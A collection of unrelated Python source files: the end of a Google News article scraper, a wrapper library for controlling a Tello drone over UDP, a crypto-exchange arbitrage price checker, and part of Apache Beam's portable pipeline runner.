    return GOOGLE_NEWS_URL.format(query, str(year_start), str(year_end), start)
def extract_links(content):
    """Parse a Google News results page and return a list of
    (link, source, date) tuples.

    The CSS classes below are tied to Google's current markup and will
    silently yield nothing if Google changes them.
    """
    soup = BeautifulSoup(content, 'html.parser')
    links_list = [v.attrs['href'] for v in soup.find_all('a', {'style': 'text-decoration:none;display:block'})]
    dates_list = [v.text for v in soup.find_all('span', {'class': 'WG9SHc'})]
    sources_list = [v.text for v in soup.find_all('div', {'class': 'XTjFC WF4CUc'})]
    output = []
    for (link, date, source) in zip(links_list, dates_list, sources_list):
        try:
            date = str(dateparser.parse(date))
        # Narrowed from a bare `except:`; on failure keep the raw date text.
        except Exception:
            pass
        output.append((link, source, date))
    return output
def get_article(link, news, date):
    """Download, parse and summarize the article at `link`.

    Tries the default (English) model first; if the parse comes back
    essentially empty, retries with the Indonesian ('id') model.
    Returns a dict of the extracted fields plus the caller-supplied
    `news` source and `date`.
    """
    def _fetch(**kwargs):
        parsed = Article(link, **kwargs)
        parsed.download()
        parsed.parse()
        parsed.nlp()
        return parsed

    lang = 'ENGLISH'
    article = _fetch()
    # Heuristic: a near-empty title or body means the English model failed.
    if min(len(article.title), len(article.text)) < 5:
        lang = 'INDONESIA'
        print('found BM/ID article')
        article = _fetch(language = 'id')
    return {
        'title': article.title,
        'url': link,
        'authors': article.authors,
        'top-image': article.top_image,
        'text': article.text,
        'keyword': article.keywords,
        'summary': article.summary,
        'news': news,
        'date': date,
        'language': lang,
    }
def google_news_run(
    keyword,
    limit=10,
    year_start=2010,
    year_end=2011,
    debug=True,
    sleep_time_every_ten_articles=0,
):
    """Scrape Google News results for `keyword` within the given year range.

    Fetches result pages ten entries at a time until `limit` entries have
    been requested, downloading and parsing each linked article.

    Returns whatever articles were collected so far when Google blocks the
    client, returns no results, or the page set is exhausted.
    """
    num_articles_index = 0
    # Removed the unused `ua = UserAgent()` local: it was never read and its
    # construction performs a needless network fetch of user-agent data.
    results = []
    while num_articles_index < limit:
        url = forge_url(keyword, num_articles_index, year_start, year_end)
        if debug:
            logging.debug('For Google -> {}'.format(url))
            logging.debug(
                'Total number of calls to Google = {}'.format(
                    NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT
                )
            )
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'
        }
        try:
            response = requests.get(url, headers=headers, timeout=60)
            # Google serves a CAPTCHA page when it rate-limits the client.
            if (
                str(response.content).find(
                    'In the meantime, solving the above CAPTCHA will let you continue to use our services'
                )
                >= 0
            ):
                print('whops, blocked')
                return results
            links = extract_links(response.content)
            nb_links = len(links)
            if nb_links == 0 and num_articles_index == 0:
                print(
                    'No results fetched. Either the keyword is wrong or you have been banned from Google. Retry tomorrow or change of IP Address.'
                )
                return results
            if nb_links == 0:
                print('No more news to read for keyword {}.'.format(keyword))
                return results
            for link in links:
                try:
                    results.append(get_article(*link))
                # Narrowed from a bare `except:`; best-effort — skip
                # articles that fail to download or parse.
                except Exception:
                    pass
        except requests.exceptions.Timeout:
            logging.debug(
                'Google news Timeout. Maybe the connection is too slow. Skipping.'
            )
            # NOTE(review): the index is not advanced here, so a persistently
            # timing-out page is retried forever — confirm that is intended.
            continue
        num_articles_index += 10
        if debug and sleep_time_every_ten_articles != 0:
            logging.debug(
                'Program is going to sleep for {} seconds.'.format(
                    sleep_time_every_ten_articles
                )
            )
            time.sleep(sleep_time_every_ten_articles)
    return results
|
tello.py | # coding=utf-8
import socket
import time
import threading
import cv2
from threading import Thread
from djitellopy.decorators import accepts
class Tello:
    """Python wrapper to interact with the Ryze Tello drone using the official Tello api.
    Tello API documentation:
    https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf
    """
    # Send and receive commands, client socket
    UDP_IP = '192.168.10.1'
    UDP_PORT = 8889
    RESPONSE_TIMEOUT = 0.5  # in seconds
    TIME_BTW_COMMANDS = 0.5  # in seconds
    TIME_BTW_RC_CONTROL_COMMANDS = 0.5  # in seconds
    # Timestamp of the last completed command, in seconds since the epoch.
    # BUG FIX: the original mixed seconds (here) with milliseconds in the
    # send methods; everything now consistently uses seconds.
    last_received_command = time.time()

    # Video stream, server socket
    VS_UDP_IP: str = '0.0.0.0'
    VS_UDP_PORT = 11111

    # VideoCapture object (created lazily by get_video_capture)
    cap = None
    background_frame_read = None
    stream_on = False

    def __init__(self):
        # To send commands
        self.address = (self.UDP_IP, self.UDP_PORT)
        self.clientSocket = socket.socket(socket.AF_INET,  # Internet
                                          socket.SOCK_DGRAM)  # UDP
        self.clientSocket.bind(('', self.UDP_PORT))  # For UDP response (receiving data)
        self.response = None
        self.stream_on = False

        # Run tello udp receiver on background
        thread = threading.Thread(target=self.run_udp_receiver, args=())
        thread.daemon = True
        thread.start()

    def run_udp_receiver(self):
        """Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread
        in order to not block the main thread."""
        while True:
            try:
                self.response, _ = self.clientSocket.recvfrom(1024)  # buffer size is 1024 bytes
            except Exception as e:
                print(e)
                break

    def get_udp_video_address(self):
        """Return the UDP URL the drone streams video to."""
        return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT)  # + '?overrun_nonfatal=1&fifo_size=5000'

    def get_video_capture(self):
        """Get the VideoCapture object from the camera drone
        Returns:
            VideoCapture
        """
        if self.cap is None:
            self.cap = cv2.VideoCapture(self.get_udp_video_address())
            # BUG FIX: was `print(get_udp_video_address())` — NameError,
            # the `self.` prefix was missing.
            print(self.get_udp_video_address())

        if not self.cap.isOpened():
            self.cap.open(self.get_udp_video_address())

        return self.cap

    def get_frame_read(self):
        """Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
        backgroundFrameRead.frame to get the actual frame received by the drone.
        Returns:
            BackgroundFrameRead
        """
        if self.background_frame_read is None:
            self.background_frame_read = BackgroundFrameRead(self, self.get_udp_video_address()).start()
        return self.background_frame_read

    def stop_video_capture(self):
        """Stop the video stream (alias for streamoff)."""
        return self.streamoff()

    @accepts(command=str)
    def send_command_with_return(self, command):
        """Send command to Tello and wait for its response.
        Return:
            str: the decoded response on success
            bool: False on timeout
        """
        # Commands sent back-to-back make the drone unresponsive, so wait at
        # least self.TIME_BTW_COMMANDS seconds between commands.
        # BUG FIX: the original compared a millisecond difference against
        # constants expressed in seconds (so the pacing and timeout logic
        # never behaved as intended); all arithmetic is now in seconds.
        diff = time.time() - self.last_received_command
        if diff < self.TIME_BTW_COMMANDS:
            time.sleep(self.TIME_BTW_COMMANDS - diff)

        print('Send command: ' + command)
        timestamp = time.time()

        self.clientSocket.sendto(command.encode('utf-8'), self.address)

        # self.response is filled in by the background run_udp_receiver thread.
        while self.response is None:
            if time.time() - timestamp > self.RESPONSE_TIMEOUT:
                print('Timeout exceed on command ' + command)
                return False

        print('Response: ' + str(self.response))

        response = self.response.decode('utf-8')
        self.response = None
        self.last_received_command = time.time()

        return response

    @accepts(command=str)
    def send_command_without_return(self, command):
        """Send command to Tello without expecting a response. Use this method when you want to send a command
        continuously
            - go x y z speed: Tello fly to x y z in speed (cm/s)
                x: 20-500
                y: 20-500
                z: 20-500
                speed: 10-100
            - curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with
                speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responses false.
                x/y/z can't be between -20 - 20 at the same time.
                x1, x2: 20-500
                y1, y2: 20-500
                z1, z2: 20-500
                speed: 10-60
            - rc a b c d: Send RC control via four channels.
                a: left/right (-100~100)
                b: forward/backward (-100~100)
                c: up/down (-100~100)
                d: yaw (-100~100)
        """
        print('Send command (no expect response): ' + command)
        self.clientSocket.sendto(command.encode('utf-8'), self.address)

    @accepts(command=str)
    def send_control_command(self, command):
        """Send control command to Tello and wait for its response. Possible control commands:
            - command: entry SDK mode
            - takeoff: Tello auto takeoff
            - land: Tello auto land
            - streamon: Set video stream on
            - streamoff: Set video stream off
            - emergency: Stop all motors immediately
            - up/down/left/right/forward/back x: move with distance x cm. x: 20-500
            - cw x / ccw x: rotate x degrees (counter-)clockwise. x: 1-3600
            - flip x: flip in direction x: l (left), r (right), f (forward), b (back)
            - speed x: set speed to x cm/s. x: 10-100
            - wifi ssid pass: Set Wi-Fi with SSID password
        Return:
            bool: True for successful, False for unsuccessful
        """
        response = self.send_command_with_return(command)

        if response == 'OK' or response == 'ok':
            return True
        else:
            return self.return_error_on_send_command(command, response)

    @accepts(command=str)
    def send_read_command(self, command):
        """Send read command to Tello and wait for its response. Possible read commands:
            - speed?: get current speed (cm/s): x: 1-100
            - battery?: get current battery percentage: x: 0-100
            - time?: get current fly time (s): time
            - height?: get height (cm): x: 0-3000
            - temp?: get temperature (°C): x: 0-90
            - attitude?: get IMU attitude data: pitch roll yaw
            - baro?: get barometer value (m): x
            - tof?: get distance value from TOF (cm): x: 30-1000
            - wifi?: get Wi-Fi SNR: snr
        Return:
            int/str: the parsed response on success
            bool: False for unsuccessful
        """
        response = self.send_command_with_return(command)

        try:
            response = str(response)
        except TypeError as e:
            print(e)

        if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
            if response.isdigit():
                return int(response)
            else:
                return response
        else:
            return self.return_error_on_send_command(command, response)

    @staticmethod
    def return_error_on_send_command(command, response):
        """Returns False and print an informative result code to show unsuccessful response"""
        print('Command ' + command + ' was unsuccessful. Message: ' + str(response))
        return False

    def connect(self):
        """Entry SDK mode
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command("command")

    def takeoff(self):
        """Tello auto takeoff
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command("takeoff")

    def land(self):
        """Tello auto land
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command("land")

    def streamon(self):
        """Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That
        can be done through the Tello app.
        Returns:
            bool: True for successful, False for unsuccessful
        """
        result = self.send_control_command("streamon")
        if result is True:
            self.stream_on = True
        return result

    def streamoff(self):
        """Set video stream off
        Returns:
            bool: True for successful, False for unsuccessful
        """
        result = self.send_control_command("streamoff")
        if result is True:
            self.stream_on = False
        return result

    def emergency(self):
        """Stop all motors immediately
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command("emergency")

    @accepts(direction=str, x=int)
    def move(self, direction, x):
        """Tello fly up, down, left, right, forward or back with distance x cm.
        Arguments:
            direction: up, down, left, right, forward or back
            x: 20-500
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command(direction + ' ' + str(x))

    @accepts(x=int)
    def move_up(self, x):
        """Tello fly up with distance x cm.
        Arguments:
            x: 20-500
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.move("up", x)

    @accepts(x=int)
    def move_down(self, x):
        """Tello fly down with distance x cm.
        Arguments:
            x: 20-500
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.move("down", x)

    @accepts(x=int)
    def move_left(self, x):
        """Tello fly left with distance x cm.
        Arguments:
            x: 20-500
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.move("left", x)

    @accepts(x=int)
    def move_right(self, x):
        """Tello fly right with distance x cm.
        Arguments:
            x: 20-500
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.move("right", x)

    @accepts(x=int)
    def move_forward(self, x):
        """Tello fly forward with distance x cm.
        Arguments:
            x: 20-500
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.move("forward", x)

    @accepts(x=int)
    def move_back(self, x):
        """Tello fly back with distance x cm.
        Arguments:
            x: 20-500
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.move("back", x)

    # BUG FIX: a second, identical `move_up` definition followed here and
    # silently shadowed the one above; the duplicate has been removed.

    @accepts(x=int)
    def rotate_clockwise(self, x):
        """Tello rotate x degree clockwise.
        Arguments:
            x: 1-3600
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command("cw " + str(x))

    @accepts(x=int)
    def rotate_counter_clockwise(self, x):
        """Tello rotate x degree counter-clockwise.
        Arguments:
            x: 1-3600
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command("ccw " + str(x))

    # BUG FIX: decorator key was `x=str` while the parameter is named
    # `direction`, so the type check never applied to the real argument.
    @accepts(direction=str)
    def flip(self, direction):
        """Tello fly flip.
        Arguments:
            direction: l (left), r (right), f (forward) or b (back)
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command("flip " + direction)

    def flip_left(self):
        """Tello fly flip left.
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.flip("l")

    def flip_right(self):
        """Tello fly flip right.
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.flip("r")

    def flip_forward(self):
        """Tello fly flip forward.
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.flip("f")

    def flip_back(self):
        """Tello fly flip back.
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.flip("b")

    @accepts(x=int, y=int, z=int, speed=int)
    def go_xyz_speed(self, x, y, z, speed):
        """Tello fly to x y z in speed (cm/s)
        Arguments:
            x: 20-500
            y: 20-500
            z: 20-500
            speed: 10-100
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_command_without_return('go %s %s %s %s' % (x, y, z, speed))

    # BUG FIX: this method was also named `go_xyz_speed`, silently shadowing
    # the `go` command above; renamed to match the `curve` command it sends.
    @accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int)
    def curve_xyz_speed(self, x1, y1, z1, x2, y2, z2, speed):
        """Tello fly a curve defined by the current and two given coordinates with speed (cm/s).
            - If the arc radius is not within the range of 0.5-10 meters, it responses false.
            - x/y/z can't be between -20 - 20 at the same time.
        Arguments:
            x1, x2: 20-500
            y1, y2: 20-500
            z1, z2: 20-500
            speed: 10-60
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_command_without_return('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))

    @accepts(x=int)
    def set_speed(self, x):
        """Set speed to x cm/s.
        Arguments:
            x: 10-100
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command("speed " + str(x))

    # Timestamp (seconds since epoch) of the last rc command sent.
    last_rc_control_sent = 0

    @accepts(left_right_velocity=int, forward_backward_velocity=int, up_down_velocity=int, yaw_velocity=int)
    def send_rc_control(self, left_right_velocity, forward_backward_velocity, up_down_velocity, yaw_velocity):
        """Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
        Arguments:
            left_right_velocity: -100~100 (left/right)
            forward_backward_velocity: -100~100 (forward/backward)
            up_down_velocity: -100~100 (up/down)
            yaw_velocity: -100~100 (yaw)
        Returns:
            bool: True for successful, False for unsuccessful
        """
        # Throttle: drop commands arriving faster than the allowed rate.
        # BUG FIX: the original compared milliseconds against a constant
        # expressed in seconds, so the throttle effectively never engaged.
        if time.time() - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS:
            pass
        else:
            self.last_rc_control_sent = time.time()
            return self.send_command_without_return('rc %s %s %s %s' % (left_right_velocity, forward_backward_velocity,
                                                                        up_down_velocity, yaw_velocity))

    def set_wifi_with_ssid_password(self):
        """Set Wi-Fi with SSID password.
        Returns:
            bool: True for successful, False for unsuccessful
        """
        return self.send_control_command('wifi ssid pass')

    def get_speed(self):
        """Get current speed (cm/s)
        Returns:
            False: Unsuccessful
            int: 1-100
        """
        return self.send_read_command('speed?')

    def get_battery(self) -> object:
        """Get current battery percentage
        Returns:
            False: Unsuccessful
            int: 0-100
        """
        return self.send_read_command('battery?')

    def get_flight_time(self):
        """Get current fly time (s)
        Returns:
            False: Unsuccessful
            int: Seconds elapsed during flight.
        """
        return self.send_read_command('time?')

    def get_height(self):
        """Get height (cm)
        Returns:
            False: Unsuccessful
            int: 0-3000
        """
        return self.send_read_command('height?')

    def get_temperature(self):
        """Get temperature (°C)
        Returns:
            False: Unsuccessful
            int: 0-90
        """
        # BUG FIX: the SDK 1.3 read command is 'temp?' (as documented in
        # send_read_command above); 'temperature?' is not a valid command.
        return self.send_read_command('temp?')

    def get_attitude(self):
        """Get IMU attitude data
        Returns:
            False: Unsuccessful
            int: pitch roll yaw
        """
        return self.send_read_command('attitude?')

    def get_barometer(self):
        """Get barometer value (m)
        Returns:
            False: Unsuccessful
            int: 0-100
        """
        return self.send_read_command('baro?')

    def get_distance_tof(self):
        """Get distance value from TOF (cm)
        Returns:
            False: Unsuccessful
            int: 30-1000
        """
        return self.send_read_command('tof?')

    def get_wifi(self):
        """Get Wi-Fi SNR
        Returns:
            False: Unsuccessful
            str: snr
        """
        return self.send_read_command('wifi?')

    def end(self):
        """Call this method when you want to end the tello object"""
        if self.stream_on:
            self.streamoff()
        if self.background_frame_read is not None:
            self.background_frame_read.stop()
        if self.cap is not None:
            self.cap.release()
class BackgroundFrameRead:
    """
    Reads frames from a VideoCapture on a background thread; read the most
    recent one from `backgroundFrameRead.frame`.
    """

    def __init__(self, tello, address):
        tello.cap = cv2.VideoCapture(address)
        self.cap = tello.cap
        if not self.cap.isOpened():
            self.cap.open(address)
        self.grabbed, self.frame = self.cap.read()
        self.stopped = False

    def start(self):
        # Fire-and-forget reader thread; returns self so callers can chain.
        Thread(target=self.update_frame, args=()).start()
        return self

    def update_frame(self):
        # Keep grabbing frames until stopped, a grab fails, or the capture
        # is closed.
        while not self.stopped:
            if self.grabbed and self.cap.isOpened():
                (self.grabbed, self.frame) = self.cap.read()
            else:
                self.stop()

    def stop(self):
        self.stopped = True
|
pytrade.py | #!/usr/bin/python3.5
import sys
sys.path.append('exchanges')
import poloniex
import kraken
import bitstamp
import okcoin
import time
import threading
coin = ["Bitcoin", "Litecoin", "Ethereum", "Bitcoin Cash"]
coin_index = 0
coin_index_max = len(coin) - 1
# Each entry: [display name, exchange module, list of supported coin indices].
index = [["Poloniex", poloniex, [0, 1, 2, 3]], ["Kraken", kraken, [0, 1, 2, 3]], ["Bitstamp", bitstamp, [0, 1, 2, 3]],
         ["OKCoin", okcoin, [0, 1, 2, 3]]]

# Round-robin over the coins forever, refreshing every exchange in parallel
# and printing any cross-exchange arbitrage opportunity found.
while True:
    if coin_index > coin_index_max:
        coin_index = 0
    workers = []
    time.sleep(2)
    for exchange in index:
        print('[UPDATING] {}'.format(exchange[0]))
        # BUG FIX: the original passed `target=exchange[1].update(coin_index)`,
        # which CALLS update() immediately (serially, on the main thread) and
        # hands its return value to Thread. Pass the callable and its args
        # instead so the updates actually run concurrently.
        worker = threading.Thread(target=exchange[1].update, args=(coin_index,))
        workers.append(worker)
        worker.start()
    for worker in workers:
        worker.join()
    for exchange in index:
        for exchange2 in index:
            # Compare every ordered pair of distinct exchanges that both
            # support the current coin.
            if exchange[1] != exchange2[1] and coin_index in exchange[2] and coin_index in exchange2[2]:
                if exchange[1].lastask[0] - exchange2[1].lastbid[0] < 0:
                    print(
                        '[TRADE] Buy {} on\t{} \tat {:.8f}\tthen Sell on {}\tat {:.8f}\tProfits of {:.8f} ({:.4f}%)'.format(
                            coin[coin_index], exchange[0], exchange[1].lastask[0], exchange2[0],
                            exchange2[1].lastbid[0],
                            exchange2[1].lastbid[0] - exchange[1].lastask[0],
                            # BUG FIX: the original printed the raw bid/ask
                            # ratio as a "%"; convert it to an actual percent.
                            (exchange2[1].lastbid[0] / exchange[1].lastask[0] - 1) * 100))
                elif exchange[1].lastbid[0] - exchange2[1].lastask[0] > 0:
                    print(
                        '[TRADE] Sell {} on\t{} \tat {:.8f}\tthen Buy on {}\tat {:.8f}\tProfits of {:.8f} ({:.4f}%)'.format(
                            coin[coin_index], exchange[0], exchange[1].lastbid[0], exchange2[0],
                            exchange2[1].lastask[0],
                            exchange[1].lastbid[0] - exchange2[1].lastask[0],
                            (exchange[1].lastbid[0] / exchange2[1].lastask[0] - 1) * 100))
    coin_index = coin_index + 1
|
portable_runner.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import functools
import itertools
import json
import logging
import os
import threading
from concurrent import futures
import grpc
from apache_beam import metrics
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import local_job_service
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.portability.job_server import DockerizedJobServer
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker import sdk_worker_main
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.STOPPED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
class PortableRunner(runner.PipelineRunner):
  """
  Experimental: No backward compatibility guaranteed.
  A BeamRunner that executes Python pipelines via the Beam Job API.
  This runner is a stub and does not run the actual job.
  This runner schedules the job on a job service. The responsibility of
  running and managing the job lies with the job service used.
  """

  @staticmethod
  def default_docker_image():
    """Return the SDK-harness docker image tag derived from $USER, or
    'unknown' when $USER is not set."""
    if 'USER' in os.environ:
      # Perhaps also test if this was built?
      logging.info('Using latest locally built Python SDK docker image.')
      return os.environ['USER'] + '-docker-apache.bintray.io/beam/python:latest'
    else:
      logging.warning('Could not find a Python SDK docker image.')
      return 'unknown'

  @staticmethod
  def _create_environment(options):
    """Translate PortableOptions.environment_type/environment_config into a
    runner-API Environment proto (DOCKER, PROCESS, EXTERNAL, or a raw
    'beam:env:*' urn). Raises ValueError on an unrecognized type."""
    portable_options = options.view_as(PortableOptions)
    environment_urn = common_urns.environments.DOCKER.urn
    if portable_options.environment_type == 'DOCKER':
      environment_urn = common_urns.environments.DOCKER.urn
    elif portable_options.environment_type == 'PROCESS':
      environment_urn = common_urns.environments.PROCESS.urn
    elif portable_options.environment_type in ('EXTERNAL', 'LOOPBACK'):
      environment_urn = common_urns.environments.EXTERNAL.urn
    elif portable_options.environment_type:
      if portable_options.environment_type.startswith('beam:env:'):
        environment_urn = portable_options.environment_type
      else:
        raise ValueError(
            'Unknown environment type: %s' % portable_options.environment_type)

    if environment_urn == common_urns.environments.DOCKER.urn:
      docker_image = (
          portable_options.environment_config
          or PortableRunner.default_docker_image())
      return beam_runner_api_pb2.Environment(
          url=docker_image,
          urn=common_urns.environments.DOCKER.urn,
          payload=beam_runner_api_pb2.DockerPayload(
              container_image=docker_image
          ).SerializeToString())
    elif environment_urn == common_urns.environments.PROCESS.urn:
      # For PROCESS the environment_config is a JSON object with
      # os/arch/command/env keys.
      config = json.loads(portable_options.environment_config)
      return beam_runner_api_pb2.Environment(
          urn=common_urns.environments.PROCESS.urn,
          payload=beam_runner_api_pb2.ProcessPayload(
              os=(config.get('os') or ''),
              arch=(config.get('arch') or ''),
              command=config.get('command'),
              env=(config.get('env') or '')
          ).SerializeToString())
    elif environment_urn == common_urns.environments.EXTERNAL.urn:
      return beam_runner_api_pb2.Environment(
          urn=common_urns.environments.EXTERNAL.urn,
          payload=beam_runner_api_pb2.ExternalPayload(
              endpoint=endpoints_pb2.ApiServiceDescriptor(
                  url=portable_options.environment_config)
          ).SerializeToString())
    else:
      return beam_runner_api_pb2.Environment(
          urn=environment_urn,
          payload=(portable_options.environment_config.encode('ascii')
                   if portable_options.environment_config else None))

  def run_pipeline(self, pipeline, options):
    """Translate `pipeline` to a runner-API proto, submit it to the
    configured job service (starting a dockerized one if no endpoint was
    given), and return a PipelineResult tracking the remote job."""
    portable_options = options.view_as(PortableOptions)
    job_endpoint = portable_options.job_endpoint

    # TODO: https://issues.apache.org/jira/browse/BEAM-5525
    # portable runner specific default
    if options.view_as(SetupOptions).sdk_location == 'default':
      options.view_as(SetupOptions).sdk_location = 'container'

    if not job_endpoint:
      # TODO Provide a way to specify a container Docker URL
      # https://issues.apache.org/jira/browse/BEAM-6328
      docker = DockerizedJobServer()
      job_endpoint = docker.start()
      job_service = None
    elif job_endpoint == 'embed':
      job_service = local_job_service.LocalJobServicer()
    else:
      job_service = None

    # This is needed as we start a worker server if one is requested
    # but none is provided.
    if portable_options.environment_type == 'LOOPBACK':
      portable_options.environment_config, server = (
          BeamFnExternalWorkerPoolServicer.start(
              sdk_worker_main._get_worker_count(options)))
      # NOTE(review): stashes the worker server in a module global,
      # apparently to keep it alive for the duration of the job — looks
      # like a debugging hack; confirm before removing.
      globals()['x'] = server
      cleanup_callbacks = [functools.partial(server.stop, 1)]
    else:
      cleanup_callbacks = []

    proto_pipeline = pipeline.to_runner_api(
        default_environment=PortableRunner._create_environment(
            portable_options))

    # Some runners won't detect the GroupByKey transform unless it has no
    # subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
    for _, transform_proto in list(
        proto_pipeline.components.transforms.items()):
      if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
        for sub_transform in transform_proto.subtransforms:
          del proto_pipeline.components.transforms[sub_transform]
        del transform_proto.subtransforms[:]

    # Preemptively apply combiner lifting, until all runners support it.
    # This optimization is idempotent.
    pre_optimize = options.view_as(DebugOptions).lookup_experiment(
        'pre_optimize', 'combine').lower()
    if not options.view_as(StandardOptions).streaming:
      flink_known_urns = frozenset([
          common_urns.composites.RESHUFFLE.urn,
          common_urns.primitives.IMPULSE.urn,
          common_urns.primitives.FLATTEN.urn,
          common_urns.primitives.GROUP_BY_KEY.urn])
      if pre_optimize == 'combine':
        proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
            proto_pipeline,
            phases=[fn_api_runner_transforms.lift_combiners],
            known_runner_urns=flink_known_urns,
            partial=True)
      elif pre_optimize == 'all':
        proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
            proto_pipeline,
            phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
                    fn_api_runner_transforms.annotate_stateful_dofns_as_roots,
                    fn_api_runner_transforms.fix_side_input_pcoll_coders,
                    fn_api_runner_transforms.lift_combiners,
                    fn_api_runner_transforms.fix_flatten_coders,
                    # fn_api_runner_transforms.sink_flattens,
                    fn_api_runner_transforms.greedily_fuse,
                    fn_api_runner_transforms.read_to_impulse,
                    fn_api_runner_transforms.extract_impulse_stages,
                    fn_api_runner_transforms.remove_data_plane_ops,
                    fn_api_runner_transforms.sort_stages],
            known_runner_urns=flink_known_urns)
      elif pre_optimize == 'none':
        pass
      else:
        raise ValueError('Unknown value for pre_optimize: %s' % pre_optimize)

    # When no embedded job service was created above, connect to the remote
    # endpoint over gRPC.
    if not job_service:
      channel = grpc.insecure_channel(job_endpoint)
      grpc.channel_ready_future(channel).result()
      job_service = beam_job_api_pb2_grpc.JobServiceStub(channel)
    else:
      channel = None

    # fetch runner options from job service
    # retries in case the channel is not ready
    def send_options_request(max_retries=5):
      num_retries = 0
      while True:
        try:
          # This reports channel is READY but connections may fail
          # Seems to be only an issue on Mac with port forwardings
          if channel:
            grpc.channel_ready_future(channel).result()
          return job_service.DescribePipelineOptions(
              beam_job_api_pb2.DescribePipelineOptionsRequest())
        except grpc._channel._Rendezvous as e:
          num_retries += 1
          if num_retries > max_retries:
            raise e

    options_response = send_options_request()

    def add_runner_options(parser):
      # Dynamically extend the argparse parser with the options the job
      # service advertised in options_response.
      for option in options_response.options:
        try:
          # no default values - we don't want runner options
          # added unless they were specified by the user
          add_arg_args = {'action' : 'store', 'help' : option.description}
          if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
            add_arg_args['action'] = 'store_true'\
              if option.default_value != 'true' else 'store_false'
          elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
            add_arg_args['type'] = int
          elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
            add_arg_args['action'] = 'append'
          parser.add_argument("--%s" % option.name, **add_arg_args)
        except Exception as e:
          # ignore runner options that are already present
          # only in this case is duplicate not treated as error
          if 'conflicting option string' not in str(e):
            raise
          logging.debug("Runner option '%s' was already added" % option.name)

    all_options = options.get_all_options(add_extra_args_fn=add_runner_options)
    # TODO: Define URNs for options.
    # convert int values: https://issues.apache.org/jira/browse/BEAM-5509
